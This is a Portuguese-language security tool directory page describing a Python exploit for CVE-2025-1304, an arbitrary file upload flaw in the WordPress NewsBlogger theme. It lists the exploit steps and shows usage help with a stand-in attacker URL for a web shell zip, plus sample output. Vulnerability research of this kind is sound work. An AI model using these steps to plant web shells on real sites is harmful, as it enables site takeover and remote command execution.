Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-1304 — WordPress NewsBlogger Theme <= 0.2.5.1 é vulnerável a Upload Arbitrário de Arquivos | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-1304
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-1304

CVE-2025-1304

WordPress NewsBlogger Theme <= 0.2.5.1 é vulnerável a Upload Arbitrário de Arquivos

Ver Repositório
21há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 Tema NewsBlogger do WordPress <= 0.2.5.1 - Upload Arbitrário de Arquivo (CVE-2025-1304)

Pontuação CVSS: 8.8 (Alto)
Tipo de Vulnerabilidade: Upload Arbitrário de Arquivo
Componente: Tema WordPress
ID CVE: CVE-2025-1304


🔥 Visão Geral da Vulnerabilidade

O tema NewsBlogger do WordPress (versões <= 0.2.5.1) é vulnerável a um Upload Arbitrário de Arquivo através do painel de boas-vindas do administrador.

Esta vulnerabilidade permite que qualquer usuário autenticado — incluindo aqueles com a função mínima de Assinante — faça upload de um arquivo .zip malicioso contendo um web shell.
O upload ocorre através de um campo de URL de plugin não validado, que falha em verificar adequadamente o conteúdo ou tipo do arquivo enviado.

Um ataque bem-sucedido pode levar ao comprometimento total do site, incluindo execução remota de comandos e escalonamento de privilégios.


🧠 Detalhes do Script

Este script Python automatiza a exploração da vulnerabilidade ao:

  • Fazer login usando as credenciais de administrador fornecidas.
  • Extrair o nonce dinamicamente da página de boas-vindas vulnerável.
  • Enviar um plugin malicioso remoto através do endpoint AJAX vulnerável.

  • ⚙️ Instruções de Uso

    root@kitploit:~
    python CVE-2025-1304.py -h
    
    root@kitploit:~
    usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
    
    WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )
    
    options:
      -h, --help                show this help message and exit
      --url, -u URL             Target base URL (e.g., http://target/wordpress)
      --username, -un USERNAME WordPress admin username
      --password, -p PASSWORD   WordPress admin password
      --shellweb, -shell SHELLWEB
                               Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
    

    📤 Exemplo de Saída

    root@kitploit:~
    [+] Logging in to http://target/wordpress/wp-login.php
    [+] Logged in successfully.
    [+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
    [+] Extracted nonce: 012818100b
    [+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
    [+] Server response:
    {"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
    

    ⚠️ Isenção de Responsabilidade

    Este código é fornecido apenas para fins educacionais e testes de segurança autorizados.
    O autor não assume nenhuma responsabilidade por uso indevido ou danos causados por esta ferramenta.


    Por: Nxploited ( Khaled Alenazi )

    Baixar ferramenta